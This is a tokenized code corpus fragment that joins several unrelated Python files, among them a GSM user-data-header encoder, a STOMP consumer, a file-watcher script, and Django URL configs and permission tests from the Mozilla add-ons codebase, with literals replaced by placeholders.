( file , length ) <EOL> parsed = file . tell ( ) - fStart <EOL> if parsed != length + <NUM_LIT:2> : <EOL> raise UDHParseError ( "<STR_LIT>" % ( length + <NUM_LIT:2> , parsed ) ) <EOL> if identifier is None : <EOL> return None <EOL> return gsm_types . InformationElement ( identifier , data ) <EOL> class UserDataHeaderEncoder ( IEncoder ) : <EOL> iEEncoder = InformationElementEncoder ( ) <EOL> int8Encoder = Int8Encoder ( ) <EOL> def encode ( self , udh ) : <EOL> nonRepeatable = { } <EOL> iEBytes = '<STR_LIT>' <EOL> for iElement in udh : <EOL> if not self . isIdentifierRepeatable ( iElement . identifier ) : <EOL> if iElement . identifier in nonRepeatable : <EOL> raise ValueError ( "<STR_LIT>" % str ( iElement . identifier ) ) <EOL> for identifier in self . getIdentifierExclusionList ( iElement . identifier ) : <EOL> if identifier in nonRepeatable : <EOL> raise ValueError ( "<STR_LIT>" % ( str ( iElement . identifier ) , str ( identifier ) ) ) <EOL> nonRepeatable [ iElement . identifier ] = None <EOL> iEBytes += self . iEEncoder . encode ( iElement ) <EOL> headerLen = len ( iEBytes ) <EOL> return self . int8Encoder . encode ( headerLen ) + iEBytes <EOL> def decode ( self , file ) : <EOL> repeatable = [ ] <EOL> nonRepeatable = { } <EOL> headerLen = self . int8Encoder . decode ( file ) <EOL> while file . tell ( ) < headerLen + <NUM_LIT:1> : <EOL> iStart = file . tell ( ) <EOL> iElement = self . iEEncoder . decode ( file ) <EOL> if iElement is not None : <EOL> if self . isIdentifierRepeatable ( iElement . identifier ) : <EOL> repeatable . append ( iElement ) <EOL> else : <EOL> nonRepeatable [ iElement . identifier ] = iElement <EOL> for identifier in self . getIdentifierExclusionList ( iElement . identifier ) : <EOL> if identifier in nonRepeatable : <EOL> del nonRepeatable [ identifier ] <EOL> bytesRead = file . tell ( ) - iStart <EOL> return repeatable + nonRepeatable . values ( ) <EOL> def isIdentifierRepeatable ( self , identifier ) : <EOL> return gsm_constants . information_element_identifier_full_value_map [ gsm_constants . information_element_identifier_name_map [ str ( identifier ) ] ] [ '<STR_LIT>' ] <EOL> def getIdentifierExclusionList ( self , identifier ) : <EOL> nameList = gsm_constants . information_element_identifier_full_value_map [ gsm_constants . information_element_identifier_name_map [ str ( identifier ) ] ] [ '<STR_LIT>' ] <EOL> return [ getattr ( gsm_types . InformationElementIdentifier , name ) for name in nameList ] </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import simplejson <EOL> from twisted . internet import reactor , defer <EOL> from stompest . async import StompConfig , StompCreator <EOL> class Consumer ( object ) : <EOL> QUEUE = '<STR_LIT>' <EOL> ERROR_QUEUE = '<STR_LIT>' <EOL> def __init__ ( self , config = None ) : <EOL> if config is None : <EOL> config = StompConfig ( '<STR_LIT:localhost>' , <NUM_LIT> ) <EOL> self . config = config <EOL> @ defer . inlineCallbacks <EOL> def run ( self ) : <EOL> stomp = yield StompCreator ( self . config ) . getConnection ( ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } <EOL> stomp . subscribe ( self . QUEUE , self . consume , headers , errorDestination = self . ERROR_QUEUE ) <EOL> def consume ( self , stomp , frame ) : <EOL> """<STR_LIT>""" <EOL> data = simplejson . loads ( frame [ '<STR_LIT:body>' ] ) <EOL> print "<STR_LIT>" % data [ '<STR_LIT:count>' ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> Consumer ( ) . run ( ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import time <EOL> _mtimes = { } <EOL> def timecheck ( files ) : <EOL> """<STR_LIT>""" <EOL> global _mtimes <EOL> for filename in files : <EOL> mtime = os . stat ( filename ) . st_mtime <EOL> if filename not in _mtimes : <EOL> _mtimes [ filename ] = mtime <EOL> elif mtime != _mtimes [ filename ] : <EOL> _mtimes = { } <EOL> return True <EOL> else : <EOL> return False <EOL> def watcher ( command , files ) : <EOL> """<STR_LIT>""" <EOL> while True : <EOL> if timecheck ( files ) : <EOL> os . system ( command ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def main ( ) : <EOL> command , files = sys . argv [ <NUM_LIT:1> ] , sys . argv [ <NUM_LIT:2> : ] <EOL> try : <EOL> watcher ( command , files ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from django . conf . urls import url <EOL> from . import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . AuthenticateView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . AuthenticateView . as_view ( ) ) , <EOL> url ( r'<STR_LIT>' , views . LoginView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . ProfileView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . RegisterView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . AccountSourceView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . AccountSuperCreate . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> ] </s>
<s> from mock import Mock <EOL> from pyquery import PyQuery <EOL> from olympia import amo <EOL> from olympia . amo . tests import TestCase <EOL> from olympia . addons . helpers import ( <EOL> statusflags , flag , contribution , mobile_persona_preview , <EOL> mobile_persona_confirm ) <EOL> from olympia . addons . models import Addon <EOL> class TestHelpers ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_statusflags ( self ) : <EOL> ctx = { '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : '<STR_LIT>' } <EOL> a = Addon ( status = amo . STATUS_UNREVIEWED ) <EOL> assert statusflags ( ctx , a ) == '<STR_LIT>' <EOL> featured = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> assert statusflags ( ctx , featured ) == '<STR_LIT>' <EOL> featured = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> assert statusflags ( ctx , featured ) == '<STR_LIT>' <EOL> def test_flags ( self ) : <EOL> ctx = { '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : '<STR_LIT>' } <EOL> a = Addon ( status = amo . STATUS_UNREVIEWED ) <EOL> assert flag ( ctx , a ) == '<STR_LIT>' <EOL> featured = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> assert flag ( ctx , featured ) == '<STR_LIT>' <EOL> featured = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> assert flag ( ctx , featured ) == '<STR_LIT>' <EOL> def test_contribution_box ( self ) : <EOL> a = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> a . suggested_amount = '<STR_LIT>' <EOL> settings = Mock ( ) <EOL> settings . MAX_CONTRIBUTION = <NUM_LIT:5> <EOL> request = Mock ( ) <EOL> request . GET = { '<STR_LIT:src>' : '<STR_LIT>' } <EOL> c = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : settings , <EOL> '<STR_LIT>' : request } <EOL> s = contribution ( c , a ) <EOL> doc = PyQuery ( s ) <EOL> assert doc ( '<STR_LIT>' ) . length == <NUM_LIT:1> <EOL> def test_src_retained ( self ) : <EOL> a = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> a . suggested_amount = '<STR_LIT>' <EOL> settings = Mock ( ) <EOL> settings . MAX_CONTRIBUTION = <NUM_LIT:5> <EOL> request = Mock ( ) <EOL> c = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : settings , <EOL> '<STR_LIT>' : request } <EOL> s = contribution ( c , a , contribution_src = '<STR_LIT>' ) <EOL> doc = PyQuery ( s ) <EOL> assert doc ( '<STR_LIT>' ) . attr ( '<STR_LIT:value>' ) == '<STR_LIT>' <EOL> def test_mobile_persona_preview ( self ) : <EOL> ctx = { '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : '<STR_LIT>' } <EOL> persona = Addon . objects . get ( pk = <NUM_LIT> ) . persona <EOL> s = mobile_persona_preview ( ctx , persona ) <EOL> doc = PyQuery ( s ) <EOL> bt = doc ( '<STR_LIT>' ) <EOL> assert bt <EOL> assert persona . preview_url in bt . attr ( '<STR_LIT>' ) <EOL> assert persona . json_data == bt . attr ( '<STR_LIT>' ) <EOL> assert bt . find ( '<STR_LIT:p>' ) <EOL> def _test_mobile_persona_ctx ( self ) : <EOL> request = Mock ( ) <EOL> request . APP = amo . FIREFOX <EOL> request . GET = { } <EOL> request . user . is_authenticated . return_value = False <EOL> request . user . mobile_addons = [ ] <EOL> return { '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : request } <EOL> def test_mobile_persona_confirm_large ( self ) : <EOL> persona = Addon . objects . get ( id = <NUM_LIT> ) . persona <EOL> s = mobile_persona_confirm ( self . _test_mobile_persona_ctx ( ) , persona ) <EOL> doc = PyQuery ( s ) <EOL> assert not doc ( '<STR_LIT>' ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> assert not doc ( '<STR_LIT>' ) <EOL> def test_mobile_persona_confirm_small ( self ) : <EOL> persona = Addon . objects . get ( id = <NUM_LIT> ) . persona <EOL> s = mobile_persona_confirm ( self . _test_mobile_persona_ctx ( ) , persona , <EOL> size = '<STR_LIT>' ) <EOL> doc = PyQuery ( s ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> assert not doc ( '<STR_LIT>' ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> more = doc ( '<STR_LIT>' ) <EOL> assert more <EOL> assert more . attr ( '<STR_LIT>' ) == persona . addon . get_url_path ( ) </s>
<s> import os <EOL> import re <EOL> from django . conf import settings <EOL> from django . core . files . storage import default_storage as storage <EOL> from django . core . management . base import BaseCommand <EOL> from olympia . amo . storage_utils import walk_storage <EOL> _loc_re = re . compile ( r"""<STR_LIT>""" , ( re . M | re . S ) ) <EOL> _exts = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> _root = settings . ROOT <EOL> _subs = tuple ( [ os . path . join ( _root , s ) for s in [ '<STR_LIT>' ] ] ) <EOL> class Command ( BaseCommand ) : <EOL> """<STR_LIT>""" <EOL> def handle ( self , * args , ** options ) : <EOL> count = <NUM_LIT:0> <EOL> for root , folders , files in walk_storage ( _root ) : <EOL> if not root . startswith ( _subs ) : <EOL> continue <EOL> for fname in files : <EOL> fname = os . path . join ( root , fname ) <EOL> if fname . endswith ( _exts ) : <EOL> data = storage . open ( fname ) . read ( ) <EOL> found = False <EOL> for match in _loc_re . finditer ( data ) : <EOL> if not found : <EOL> found = True <EOL> print fname <EOL> print '<STR_LIT:->' * len ( fname ) <EOL> print match . string [ match . start ( ) : match . end ( ) ] <EOL> count += <NUM_LIT:1> <EOL> if found : <EOL> print <EOL> print '<STR_LIT>' , count </s>
<s> from pyquery import PyQuery as pq <EOL> from olympia . amo . tests import TestCase <EOL> from services . pfs import get_output <EOL> class TestPfs ( TestCase ) : <EOL> def test_xss ( self ) : <EOL> for k in [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:version>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> res = get_output ( { k : '<STR_LIT>' } ) <EOL> assert not pq ( res ) ( '<STR_LIT>' ) </s>
<s> from django . contrib . auth . models import AnonymousUser <EOL> from django . test import RequestFactory <EOL> from mock import Mock <EOL> from rest_framework . authentication import SessionAuthentication <EOL> from rest_framework . permissions import AllowAny , BasePermission <EOL> from rest_framework . response import Response <EOL> from rest_framework . views import APIView <EOL> from olympia . access . models import Group , GroupUser <EOL> from olympia . addons . models import Addon <EOL> from olympia . api . permissions import ( <EOL> AllowAddonAuthor , AllowReadOnlyIfPublicAndListed , AllowReviewer , <EOL> AllowReviewerUnlisted , AnyOf , GroupPermission ) <EOL> from olympia . amo . tests import TestCase , WithDynamicEndpoints <EOL> from olympia . users . models import UserProfile <EOL> class ProtectedView ( APIView ) : <EOL> authentication_classes = [ SessionAuthentication ] <EOL> permission_classes = [ GroupPermission ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> def get ( self , request ) : <EOL> return Response ( '<STR_LIT>' ) <EOL> class AllowNone ( BasePermission ) : <EOL> """<STR_LIT>""" <EOL> def has_permission ( self , request , view ) : <EOL> return False <EOL> def has_object_permission ( self , request , view , obj ) : <EOL> return False <EOL> def myview ( * args , ** kwargs ) : <EOL> pass <EOL> class TestGroupPermissionOnView ( WithDynamicEndpoints ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> super ( TestGroupPermissionOnView , self ) . setUp ( ) <EOL> self . endpoint ( ProtectedView ) <EOL> self . url = '<STR_LIT>' <EOL> email = '<STR_LIT>' <EOL> self . user = UserProfile . objects . get ( email = email ) <EOL> group = Group . objects . create ( rules = '<STR_LIT>' ) <EOL> GroupUser . objects . create ( group = group , user = self . user ) <EOL> assert self . client . login ( username = email , <EOL> password = '<STR_LIT:password>' ) <EOL> def test_user_must_be_in_required_group ( self ) : <EOL> self . user . groups . all ( ) . delete ( ) <EOL> res = self . client . get ( self . url ) <EOL> assert res . status_code == <NUM_LIT> , res . content <EOL> assert res . data [ '<STR_LIT>' ] == ( <EOL> '<STR_LIT>' ) <EOL> def test_view_is_executed ( self ) : <EOL> res = self . client . get ( self . url ) <EOL> assert res . status_code == <NUM_LIT:200> , res . content <EOL> assert res . content == '<STR_LIT>' <EOL> class TestGroupPermission ( TestCase ) : <EOL> def test_user_cannot_be_anonymous ( self ) : <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> request . user = AnonymousUser ( ) <EOL> view = Mock ( ) <EOL> perm = GroupPermission ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert not perm . has_permission ( request , view ) <EOL> class TestAnyOf ( TestCase ) : <EOL> def test_has_permission ( self ) : <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> assert AnyOf ( AllowNone , AllowAny ) ( ) . has_permission ( request , myview ) <EOL> assert AnyOf ( AllowAny , AllowNone ) ( ) . has_permission ( request , myview ) <EOL> def test_has_permission_fail ( self ) : <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> assert not AnyOf ( AllowNone , AllowNone ) ( ) . has_permission ( <EOL> request , myview ) <EOL> def test_has_object_permission ( self ) : <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> assert AnyOf ( AllowNone , AllowAny ) ( ) . has_object_permission ( <EOL> request , myview , None ) <EOL> assert AnyOf ( AllowAny , AllowNone ) ( ) . has_object_permission ( <EOL> request , myview , None ) <EOL> def test_has_object_permission_fail ( self ) : <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> assert not AnyOf ( AllowNone , AllowNone ) ( ) . has_object_permission ( <EOL> request , myview , None ) <EOL> def test_has_object_permission_partial_fail ( self ) : <EOL> """<STR_LIT>""" <EOL> class NoObjectPerm ( BasePermission ) : <EOL> def has_permission ( self , request , view ) : <EOL> return False <EOL> class NoPerm ( BasePermission ) : <EOL> def has_object_permission ( self , request , view , obj ) : <EOL> return False <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> assert not AnyOf ( NoObjectPerm , NoPerm ) ( ) . has_object_permission ( <EOL> request , myview , None ) <EOL> class TestAllowAddonAuthor ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> self . addon = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> self . permission = AllowAddonAuthor ( ) <EOL> self . owner = self . addon . authors . all ( ) [ <NUM_LIT:0> ] <EOL> self . request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> self . request . user = AnonymousUser ( ) <EOL> def test_has_permission_anonymous ( self ) : <EOL> assert not self . permission . has_permission ( self . request , myview ) <EOL> def test_has_permission_any_authenticated_user ( self ) : <EOL> self . request . user = UserProfile . objects . get ( pk = <NUM_LIT> ) <EOL> assert self . request . user not in self . addon . authors . all ( ) <EOL> assert self . permission . has_permission ( self . request , myview ) <EOL> def test_has_object_permission_user ( self ) : <EOL> self . request . user = self . owner <EOL> assert self . permission . has_object_permission ( <EOL> self . request , myview , self . addon ) <EOL> def test_has_object_permission_different_user ( self ) : <EOL> self . request . user = UserProfile . objects . get ( pk = <NUM_LIT> ) <EOL> assert self . request . user not in self . addon . authors . all ( ) <EOL> assert not self . permission . has_object_permission ( <EOL> self . request , myview , self . addon ) <EOL> def test_has_object_permission_anonymous ( self ) : <EOL> assert not self . permission . has_object_permission ( <EOL> self . request , myview , self . addon ) <EOL> class TestAllowReviewer ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> self . permission = AllowReviewer ( ) <EOL> self . request_factory = RequestFactory ( ) <EOL> self . unsafe_methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . safe_methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_user_cannot_be_anonymous ( self ) : <EOL> request = self . request_factory . get ( '<STR_LIT:/>' ) <EOL> request . user = AnonymousUser ( ) <EOL> assert not self . permission . has_permission ( request , myview ) <EOL> assert not self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> def test_authenticated_but_not_reviewer ( self ) : <EOL> request = self . request_factory . get ( '<STR_LIT:/>' ) <EOL> request . user = UserProfile . objects . get ( pk = <NUM_LIT> ) <EOL> assert not self . permission . has_permission ( request , myview ) <EOL> assert not self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> def test_admin ( self ) : <EOL> user = UserProfile . objects . get ( email = '<STR_LIT>' ) <EOL> for method in self . safe_methods + self . unsafe_methods : <EOL> request = getattr ( self . request_factory , method ) ( '<STR_LIT:/>' ) <EOL> request . user = user <EOL> assert self . permission . has_permission ( request , myview ) <EOL> assert self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> def test_reviewer_tools_access_read_only ( self ) : <EOL> user = UserProfile . objects . get ( pk = <NUM_LIT> ) <EOL> group = Group . objects . create ( <EOL> name = '<STR_LIT>' , rules = '<STR_LIT>' ) <EOL> GroupUser . objects . create ( user = user , group = group ) <EOL> for method in self . safe_methods : <EOL> request = getattr ( self . request_factory , method ) ( '<STR_LIT:/>' ) <EOL> request . user = user <EOL> assert self . permission . has_permission ( request , myview ) <EOL> assert self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> for method in self . unsafe_methods : <EOL> request = getattr ( self . request_factory , method ) ( '<STR_LIT:/>' ) <EOL> request . user = user <EOL> assert not self . permission . has_permission ( request , myview ) <EOL> assert not self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> def test_actual_reviewer ( self ) : <EOL> user = UserProfile . objects . get ( email = '<STR_LIT>' ) <EOL> for method in self . safe_methods + self . unsafe_methods : <EOL> request = getattr ( self . request_factory , method ) ( '<STR_LIT:/>' ) <EOL> request . user = user <EOL> assert self . permission . has_permission ( request , myview ) <EOL> assert self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> class TestAllowUnlistedReviewer ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> self . permission = AllowReviewerUnlisted ( ) <EOL> self . request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> def test_user_cannot_be_anonymous ( self ) : <EOL> self . request . user = AnonymousUser ( ) <EOL> obj = Mock ( ) <EOL> obj . is_listed = False <EOL> assert not self . permission . has_permission ( self . request , myview ) <EOL> assert not self . permission . has_object_permission ( <EOL> self . request , myview , obj ) <EOL> def test_authenticated_but_not_reviewer ( self ) : <EOL> self . request . user = UserProfile . objects . get ( pk = <NUM_LIT> ) <EOL> obj = Mock ( ) <EOL> obj . is_listed = False <EOL> assert not self . permission . has_permission ( self . request , myview ) <EOL> assert not self . permission . has_object_permission ( <EOL> self . request , myview , obj ) <EOL> def test_admin ( self ) : <EOL> self . request . user = UserProfile . objects . get ( email = '<STR_LIT>' ) <EOL> obj = Mock ( ) <EOL> obj . is_listed = False <EOL> assert self . permission . has_permission ( self . request , myview ) <EOL> assert self . permission . has_object_permission ( self . request , myview , obj ) <EOL> def test_unlisted_reviewer ( self ) : <EOL> self . request . user = UserProfile . objects . get ( <EOL> email = '<STR_LIT>' ) <EOL> obj = Mock ( ) <EOL> obj . is_listed = False <EOL> assert self . permission . has_permission ( self . request , myview ) <EOL> assert self . permission . has_object_permission ( self . request , myview , obj ) <EOL> class TestAllowReadOnlyIfPublicAndListed ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . permission = AllowReadOnlyIfPublicAndListed ( ) <EOL> self . request_factory = RequestFactory ( ) <EOL> self . unsafe_methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . safe_methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def request ( self , verb ) : <EOL> request = getattr ( self . request_factory , verb ) ( '<STR_LIT:/>' ) <EOL> request . user = AnonymousUser ( ) <EOL> return request <EOL> def test_has_permission ( self ) : <EOL> for verb in self . safe_methods : <EOL> assert self . permission . has_permission ( self . request ( verb ) , myview ) <EOL> for verb in self . unsafe_methods : <EOL> assert not self . permission . has_permission ( <EOL> self . request ( verb ) , myview ) <EOL> def test_has_object_permission_public ( self ) : <EOL> obj = Mock ( ) <EOL> obj . is_public . return_value = True <EOL> obj . is_listed = True <EOL> for verb in self . safe_methods : <EOL> assert self . permission . has_object_permission ( <EOL> self . request ( verb ) , myview , obj ) <EOL> for verb in self . unsafe_methods : <EOL> assert not self . permission . has_object_permission ( <EOL> self . request ( verb ) , myview , obj ) <EOL> def test_has_object_permission_not_public ( self ) : <EOL> obj = Mock ( ) <EOL> obj . is_public . return_value = False <EOL> obj . is_listed = True <EOL> for verb in self . unsafe_methods + self . safe_methods : <EOL> assert not self . permission . has_object_permission ( <EOL> self . request ( verb ) , myview , obj ) <EOL> def test_has_object_permission_not_listed ( self ) : <EOL> obj = Mock ( ) <EOL> obj . is_public . return_value = True <EOL> obj . is_listed = False <EOL> for verb in self . unsafe_methods + self . safe_methods : <EOL> assert not self . permission . has_object_permission ( <EOL> self . request ( verb ) , myview , obj ) <EOL> def test_has_object_permission_not_listed_nor_public ( self ) : <EOL> obj = Mock ( ) <EOL> obj . is_public . return_value = False <EOL> obj . is_listed = False <EOL> for verb in self . unsafe_methods + self . safe_methods : <EOL> assert not self . permission . has_object_permission ( <EOL> self . request ( verb ) , myview , obj ) </s>
<s> from olympia . amo . tests import TestCase <EOL> from olympia . blocklist import forms <EOL> from olympia . blocklist . models import BlocklistItem , BlocklistPlugin <EOL> class BlocklistFormTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( BlocklistFormTest , self ) . setUp ( ) <EOL> self . blitem = BlocklistItem . objects . create ( ) <EOL> self . blplugin = BlocklistPlugin . objects . create ( ) <EOL> def test_app_form_only_blitem ( self ) : <EOL> data = { '<STR_LIT>' : self . blitem . pk , '<STR_LIT>' : None } <EOL> form = forms . BlocklistAppForm ( data ) <EOL> assert form . is_valid ( ) <EOL> def test_app_form_only_blplugin ( self ) : <EOL> data = { '<STR_LIT>' : self . blplugin . pk , '<STR_LIT>' : None } <EOL> form = forms . BlocklistAppForm ( data ) <EOL> assert form . is_valid ( ) <EOL> def test_app_form_neither_blplugin_and_blitem ( self ) : <EOL> data = { '<STR_LIT>' : None , '<STR_LIT>' : None } <EOL> form = forms . BlocklistAppForm ( data ) <EOL> assert not form . is_valid ( ) <EOL> assert '<STR_LIT>' in str ( form . errors ) <EOL> def test_app_form_both_blplugin_and_blitem ( self ) : <EOL> data = { '<STR_LIT>' : self . blitem . pk , '<STR_LIT>' : self . blplugin . pk } <EOL> form = forms . BlocklistAppForm ( data ) <EOL> assert not form . is_valid ( ) <EOL> assert '<STR_LIT>' in str ( form . errors ) </s>
<s> import os <EOL> import sys <EOL> import logging <EOL> import warnings <EOL> import jingo <EOL> import jingo . monkey <EOL> import session_csrf <EOL> from django . apps import AppConfig <EOL> from django . core . management import call_command <EOL> from django . conf import settings <EOL> from django . utils import translation <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> class CoreConfig ( AppConfig ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> def ready ( self ) : <EOL> super ( CoreConfig , self ) . ready ( ) <EOL> if not settings . DEBUG : <EOL> warnings . simplefilter ( '<STR_LIT:ignore>' ) <EOL> jingo . monkey . patch ( ) <EOL> jingo_env = jingo . get_env ( ) <EOL> jingo_env . install_gettext_translations ( translation , newstyle = True ) <EOL> session_csrf . monkeypatch ( ) <EOL> self . configure_logging ( ) <EOL> self . load_product_details ( ) <EOL> self . set_recursion_limit ( ) <EOL> def configure_logging ( self ) : <EOL> """<STR_LIT>""" <EOL> from olympia . lib . log_settings_base import log_configure <EOL> log_configure ( ) <EOL> def load_product_details ( self ) : <EOL> """<STR_LIT>""" <EOL> from product_details import product_details <EOL> if not product_details . last_update : <EOL> log . info ( '<STR_LIT>' ) <EOL> call_command ( '<STR_LIT>' ) <EOL> product_details . __init__ ( ) <EOL> def set_recursion_limit ( self ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in os . environ : <EOL> try : <EOL> limit = int ( os . environ [ '<STR_LIT>' ] ) <EOL> except TypeError : <EOL> log . warning ( '<STR_LIT>' . format ( <EOL> os . environ [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> sys . setrecursionlimit ( limit ) <EOL> log . info ( '<STR_LIT>' . format ( limit ) ) </s>
<s> from django . contrib import admin <EOL> from . models import DiscoveryModule <EOL> class DiscoveryModuleAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> admin . site . register ( DiscoveryModule , DiscoveryModuleAdmin ) </s>
<s> from django . conf . urls import url <EOL> from olympia . addons . urls import ADDON_ID <EOL> from olympia . editors import views , views_themes <EOL> urlpatterns = ( <EOL> url ( r'<STR_LIT>' , views . home , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_nominated , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_pending , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_prelim , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_fast_track , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_moderated , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . application_versions_json , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . unlisted_queue , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . unlisted_queue_nominated , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . unlisted_queue_pending , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . unlisted_queue_prelim , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . unlisted_list , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . eventlog , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . eventlog_detail , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . reviewlog , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . beta_signed_log , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' % ADDON_ID , views . queue_version_notes , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . queue_viewing , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . review_viewing , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' % ADDON_ID , views . review , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . performance , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . motd , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . save_motd , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' % ADDON_ID , views . abuse_reports , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . leaderboard , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' % ADDON_ID , views . whiteboard , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . home , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_list , <EOL> name = '<STR_LIT>' ) , <EOL> url ( '<STR_LIT>' , views_themes . themes_list , <EOL> name = 